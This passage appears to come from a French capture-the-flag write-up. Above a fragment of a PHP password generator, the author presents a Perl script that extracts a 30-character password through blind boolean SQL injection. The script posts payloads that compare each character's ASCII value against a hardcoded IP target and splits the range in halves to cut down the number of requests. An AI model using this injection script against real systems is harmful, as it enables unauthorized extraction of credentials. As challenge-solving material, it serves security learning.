<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$randstring</span> <span class="sy0" style="color: #339933;">=</span> <span class="st_h" style="color: blue;">''</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">while</span><span class="br0" style="color: #009900;">(</span> <span class="kw3" style="color: #990000;">strlen</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$randstring</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;"><</span><span class="nu0" style="color: #cc66cc;">30</span> <span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$t</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: #000088;">$contents</span><span class="br0" style="color: #009900;">[</span><span class="kw3" style="color: #990000;">rand</span><span class="br0" style="color: #009900;">(</span><span class="nu0" style="color: #cc66cc;">0</span><span class="sy0" style="color: #339933;">,</span> <span class="re0" style="color: #000088;">$len</span><span class="sy0" style="color: #339933;">-</span><span class="nu0" style="color: #cc66cc;">1</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">]</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span><span class="br0" style="color: #009900;">(</span><span class="kw3" style="color: #990000;">ctype_lower</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$t</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$randstring</span> <span class="sy0" style="color: #339933;">.=</span> <span class="re0" style="color: #000088;">$t</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">return</span> <span class="re0" style="color: #000088;">$randstring</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
</ol>
<br />
Il s'agirait donc de lettres randomisées formant une chaîne de 30 chars et tout en lower-case!<br />
Vite, réadaptation du script avec un peu de dichotomie:<br />
-Gain de temps,<br />
-Gain de perf énorme<br />
-Division du nombre de requests faites par 6 !<br />
<br />
Voici le code "brut de décoffrage désolé, je n'ai pas pris le temps de faire de la cosmétique et je l'ai dev' dans l'urgence car lh'aure avançait... ( je mettrais un lien en fin d'article pour avoir toutes les ressources pour ceux que ça intéresse):<br />
<br />
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#!/usr/bin/perl</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> <span class="nu0" style="color: #cc66cc;">5.010</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> Encode<span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> IO<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">File</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> Data<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">Dumper</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> HTTP<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">Cookies</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> LWP<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">UserAgent</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> URL<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">Encode</span> <span class="kw3" style="color: #000066;">qw</span><span class="br0" style="color: #009900;">(</span>url_decode_utf8 url_encode_utf8<span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">BEGIN</span><span class="sy0" style="color: #339933;">:</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$cookie_jar</span> <span class="sy0" style="color: #339933;">=</span> HTTP<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">Cookies</span><span class="sy0" style="color: #339933;">-></span><span class="kw2" style="font-weight: bold;">new</span><span class="br0" style="color: #009900;">(</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
file <span class="sy0" style="color: #339933;">=></span> <span class="st0" style="color: red;">"cookies.txt"</span><span class="sy0" style="color: #339933;">,</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$UserAgent</span> <span class="sy0" style="color: #339933;">=</span> LWP<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">UserAgent</span><span class="sy0" style="color: #339933;">-></span><span class="kw2" style="font-weight: bold;">new</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$UserAgent</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">cookie_jar</span><span class="br0" style="color: #009900;">(</span> <span class="re0" style="color: blue;">$cookie_jar</span> <span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$Arg</span><span class="sy0" style="color: #339933;">=</span><span class="nu0" style="color: #cc66cc;">1</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$Flag</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">for</span><span class="br0" style="color: #009900;">(</span><span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$i</span><span class="sy0" style="color: #339933;">=</span><span class="nu0" style="color: #cc66cc;">1</span><span class="sy0" style="color: #339933;">;</span><span class="re0" style="color: blue;">$i</span><span class="sy0" style="color: #339933;"><=</span><span class="nu0" style="color: #cc66cc;">30</span><span class="sy0" style="color: #339933;">;</span><span class="re0" style="color: blue;">$i</span><span class="sy0" style="color: #339933;">++</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#Step1: > 65 (A)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$getpass</span> <span class="sy0" style="color: #339933;">=</span> url_decode_utf8<span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"'or if(ascii(substr(password,$i,1))>65,1,0) or '0-- -"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$Url</span><span class="sy0" style="color: #339933;">=</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$response</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: blue;">$UserAgent</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">post</span><span class="br0" style="color: #009900;">(</span> <span class="re0" style="color: blue;">$Url</span><span class="sy0" style="color: #339933;">,</span> <span class="br0" style="color: #009900;">{</span> <span class="st_h" style="color: red;">'password'</span> <span class="sy0" style="color: #339933;">=></span> <span class="re0" style="color: blue;">$getpass</span> <span class="br0" style="color: #009900;">}</span> <span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$content</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: blue;">$response</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">decoded_content</span><span class="br0" style="color: #009900;">(</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: blue;">$content</span> <span class="sy0" style="color: #339933;">=~</span> <span class="co2" style="color: #009966; font-style: italic;">/True/i</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#print("Char $i > 65\n");</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;"># de 91 a 125</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$getpass</span> <span class="sy0" style="color: #339933;">=</span> url_decode_utf8<span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"'or if(ascii(substr(password,$i,1))>105,1,0) or '0-- -"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$Url</span><span class="sy0" style="color: #339933;">=</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$response</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: blue;">$UserAgent</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">post</span><span class="br0" style="color: #009900;">(</span> <span class="re0" style="color: blue;">$Url</span><span class="sy0" style="color: #339933;">,</span> <span class="br0" style="color: #009900;">{</span> <span class="st_h" style="color: red;">'password'</span> <span class="sy0" style="color: #339933;">=></span> <span class="re0" style="color: blue;">$getpass</span> <span class="br0" style="color: #009900;">}</span> <span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$content</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: blue;">$response</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">decoded_content</span><span class="br0" style="color: #009900;">(</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: blue;">$content</span> <span class="sy0" style="color: #339933;">=~</span> <span class="co2" style="color: #009966; font-style: italic;">/True/i</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#print("Char $i > 105\n");</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
GetValue<span class="br0" style="color: #009900;">(</span><span class="nu0" style="color: #cc66cc;">106</span><span class="sy0" style="color: #339933;">,</span> <span class="nu0" style="color: #cc66cc;">125</span><span class="sy0" style="color: #339933;">,</span> <span class="re0" style="color: blue;">$i</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">next</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">else</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#print("Char $i < 105\n");</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
GetValue<span class="br0" style="color: #009900;">(</span><span class="nu0" style="color: #cc66cc;">91</span><span class="sy0" style="color: #339933;">,</span> <span class="nu0" style="color: #cc66cc;">105</span><span class="sy0" style="color: #339933;">,</span> <span class="re0" style="color: blue;">$i</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">next</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">else</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#print("Char $i < 65\n");</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;"># de 33 a 64</span></div>
</li>
